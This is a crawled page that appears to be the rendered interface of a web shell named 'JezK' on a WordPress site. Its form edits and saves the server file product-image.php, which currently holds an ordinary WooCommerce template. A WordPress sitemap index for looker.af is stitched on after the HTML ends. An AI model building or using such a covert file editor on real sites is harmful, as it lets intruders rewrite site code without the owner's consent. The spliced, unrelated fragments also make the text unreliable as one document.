
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: product-image.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
/**
 * Single Product Image
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/single-product/product-image.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see     https://woo.com/document/template-structure/
 * @package WooCommerce\Templates
 * @version 7.8.0
 */

defined( &#039;ABSPATH&#039; ) || exit;

// Note: `wc_get_gallery_image_html` was added in WC 3.3.2 and did not exist prior. This check protects against theme overrides being used on older versions of WC.
if ( ! function_exists( &#039;wc_get_gallery_image_html&#039; ) ) {
	return;
}

global $product;

$columns           = apply_filters( &#039;woocommerce_product_thumbnails_columns&#039;, 4 );
$post_thumbnail_id = $product-&gt;get_image_id();
$wrapper_classes   = apply_filters(
	&#039;woocommerce_single_product_image_gallery_classes&#039;,
	array(
		&#039;woocommerce-product-gallery&#039;,
		&#039;woocommerce-product-gallery--&#039; . ( $post_thumbnail_id ? &#039;with-images&#039; : &#039;without-images&#039; ),
		&#039;woocommerce-product-gallery--columns-&#039; . absint( $columns ),
		&#039;images&#039;,
	)
);
?&gt;
&lt;div class=&quot;&lt;?php echo esc_attr( implode( &#039; &#039;, array_map( &#039;sanitize_html_class&#039;, $wrapper_classes ) ) ); ?&gt;&quot; data-columns=&quot;&lt;?php echo esc_attr( $columns ); ?&gt;&quot; style=&quot;opacity: 0; transition: opacity .25s ease-in-out;&quot;&gt;
	&lt;div class=&quot;woocommerce-product-gallery__wrapper&quot;&gt;
		&lt;?php
		if ( $post_thumbnail_id ) {
			$html = wc_get_gallery_image_html( $post_thumbnail_id, true );
		} else {
			$html  = &#039;&lt;div class=&quot;woocommerce-product-gallery__image--placeholder&quot;&gt;&#039;;
			$html .= sprintf( &#039;&lt;img src=&quot;%s&quot; alt=&quot;%s&quot; class=&quot;wp-post-image&quot; /&gt;&#039;, esc_url( wc_placeholder_img_src( &#039;woocommerce_single&#039; ) ), esc_html__( &#039;Awaiting product image&#039;, &#039;woocommerce&#039; ) );
			$html .= &#039;&lt;/div&gt;&#039;;
		}

		echo apply_filters( &#039;woocommerce_single_product_image_thumbnail_html&#039;, $html, $post_thumbnail_id ); // phpcs:disable WordPress.XSS.EscapeOutput.OutputNotEscaped

		do_action( &#039;woocommerce_product_thumbnails&#039; );
		?&gt;
	&lt;/div&gt;
&lt;/div&gt;
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
